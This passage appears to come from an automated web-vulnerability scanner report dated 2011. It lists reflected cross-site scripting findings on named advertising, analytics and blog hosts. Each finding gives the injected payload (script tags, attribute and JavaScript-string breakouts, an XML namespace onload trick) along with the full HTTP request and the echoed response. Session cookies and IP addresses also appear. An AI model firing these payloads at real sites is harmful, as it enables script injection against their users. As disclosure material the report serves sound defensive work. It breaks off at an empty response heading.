GET /beacon.js?c1=2b7be8<script>alert(1)</script>8499cdf77af &c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: UID=2695e1-80.67.74.150-1312230894
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:00:30 GMT Date: Tue, 06 Sep 2011 15:00:30 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"2b7be8<script>alert(1)</script>8499cdf77af ", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b8f5c<script>alert(1)</script>26c563a3d19 was submitted in the c10 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=b8f5c<script>alert(1)</script>26c563a3d19 &c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:53 GMT Date: Tue, 06 Sep 2011 15:32:53 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"b8f5c<script>alert(1)</script>26c563a3d19 ", c15:"", c16:"", r:""});
3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3f055<script>alert(1)</script>215fffaf43b was submitted in the c15 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15=3f055<script>alert(1)</script>215fffaf43b HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:53 GMT Date: Tue, 06 Sep 2011 15:32:53 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... RE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"3f055<script>alert(1)</script>215fffaf43b ", c16:"", r:""});
3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 302ec<script>alert(1)</script>901d717b8ca was submitted in the c2 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693302ec<script>alert(1)</script>901d717b8ca &c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:51 GMT Date: Tue, 06 Sep 2011 15:32:51 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693302ec<script>alert(1)</script>901d717b8ca ", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d7c1e<script>alert(1)</script>9d9537f6b13 was submitted in the c3 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1d7c1e<script>alert(1)</script>9d9537f6b13 &c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:51 GMT Date: Tue, 06 Sep 2011 15:32:51 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1d7c1e<script>alert(1)</script>9d9537f6b13 ", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 41993<script>alert(1)</script>fc7d8b09653 was submitted in the c4 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F41993<script>alert(1)</script>fc7d8b09653 &c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:52 GMT Date: Tue, 06 Sep 2011 15:32:52 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... =a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/41993<script>alert(1)</script>fc7d8b09653 ", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 56553<script>alert(1)</script>e3dfef08947 was submitted in the c5 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=56553<script>alert(1)</script>e3dfef08947 &c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:52 GMT Date: Tue, 06 Sep 2011 15:32:52 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"56553<script>alert(1)</script>e3dfef08947 ", c6:"", c10:"", c15:"", c16:"", r:""});
3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d95cf<script>alert(1)</script>677d9af4a8c was submitted in the c6 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=d95cf<script>alert(1)</script>677d9af4a8c &c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Tue, 20 Sep 2011 15:32:53 GMT Date: Tue, 06 Sep 2011 15:32:53 GMT Content-Length: 1263 Connection: close if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi...[SNIP]... =0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge(); COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"d95cf<script>alert(1)</script>677d9af4a8c ", c10:"", c15:"", c16:"", r:""});
3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.harbottle.com
Path:
/dm/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d3a"><script>alert(1)</script>32285faa682 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23d3a\"><script>alert(1)</script>32285faa682 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dm/index.php/23d3a"><script>alert(1)</script>32285faa682 HTTP/1.1 Host: blog.harbottle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:38 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php Status: 200 OK Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 28771 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Digital Media Law</title> <base href="http://blog.harbottle.com/dm/">...[SNIP]... <a href="http://blog.harbottle.com/dm/index.php/23d3a\"><script>alert(1)</script>32285faa682 ?paged=2">...[SNIP]...
3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.ulf-wendel.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b78"><script>alert(1)</script>06485f2279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45b78\"><script>alert(1)</script>06485f2279d in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?45b78"><script>alert(1)</script>06485f2279d =1 HTTP/1.1 Host: blog.ulf-wendel.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:38 GMT Server: Apache X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php X-Powered-By: PHP/4.4.9 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 146066 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org...[SNIP]... <a href="http://blog.ulf-wendel.de/?45b78\"><script>alert(1)</script>06485f2279d =1&paged=2">...[SNIP]...
3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://c.brightcove.com
Path:
/services/messagebroker/amf
Issue detail
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload d2555<script>alert(1)</script>79d6c0d4362 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3 HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 Content-Length: 532 Origin: http://blogs.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 content-type: application/x-amf Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 .......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Qa39efb8859c99888a16c5b96b94383131a9ffbbe cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex...[SNIP]...
Response
HTTP/1.1 200 OK X-BC-Client-IP: 50.23.123.106 X-BC-Connecting-IP: 50.23.123.106 Content-Type: application/x-amf Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:13:02 GMT Server: Content-Length: 3570 ......../1/onResult...... .C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi...[SNIP]... A........eAQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3. ..videoPlayer sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId type.mediaDTO ..Bjz... ..ivideoPlayerd2555<script>alert(1)</script>79d6c0d4362 .......... .cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription...[SNIP]...
3.26. http://cdn.krxd.net/config/ [site parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cdn.krxd.net
Path:
/config/
Issue detail
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload b16f3<script>alert(1)</script>76bb110beda was submitted in the site parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=cnbc.comb16f3<script>alert(1)</script>76bb110beda &callback=KRUX.configOnload HTTP/1.1 Host: cdn.krxd.net Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005
Response
HTTP/1.1 404 Not Found Content-Type: text/javascript P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: TornadoServer/1.2 X-Config-Cache: Miss X-Request-Time: D=10601 t=1315321012024997 X-Served-By: logger-b011.krxd.net Content-Length: 91 Date: Tue, 06 Sep 2011 14:56:52 GMT Connection: close {"error": "Non existant site for NBCU - cnbc.comb16f3<script>alert(1)</script>76bb110beda "}
3.27. http://content.plymedia.com/initialize [video parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://content.plymedia.com
Path:
/initialize
Issue detail
The value of the video request parameter is copied into an XML comment. The payload cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 was submitted in the video parameter. This input was echoed as cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /initialize?video=cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 HTTP/1.1 Host: content.plymedia.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=60 Content-Type: text/xml; charset=utf-8 Expires: Tue, 06 Sep 2011 16:15:32 GMT Server: Microsoft-IIS/7.0 X-AspNetMvc-Version: 3.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:14:32 GMT Content-Length: 599 Connection: keep-alive <!--9/6/2011 4:14:32 PM [Cached For:60, From: http://services.plymedia.com/initialize?video=cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 ]--><!--9/6/2011...[SNIP]...
3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/jsc/d3/fl.js
Issue detail
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdf7'-alert(1)-'8a1211d7b4b was submitted in the l parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b &z=0224774881 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "1bc1632-51ac-4a85262d8c280" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=416 Expires: Tue, 06 Sep 2011 15:22:56 GMT Date: Tue, 06 Sep 2011 15:16:00 GMT Content-Length: 1895 Connection: close // Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved. var zzTitle=''; var w0=new Image(); var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat=''; var zzhasAd; ...[SNIP]... %3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b ">...[SNIP]...
3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/lar/v11-001/d7/jsc/flr.js
Issue detail
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aa06'-alert(1)-'af6ec576df9 was submitted in the l parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9 &z=0224774881 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1
Response
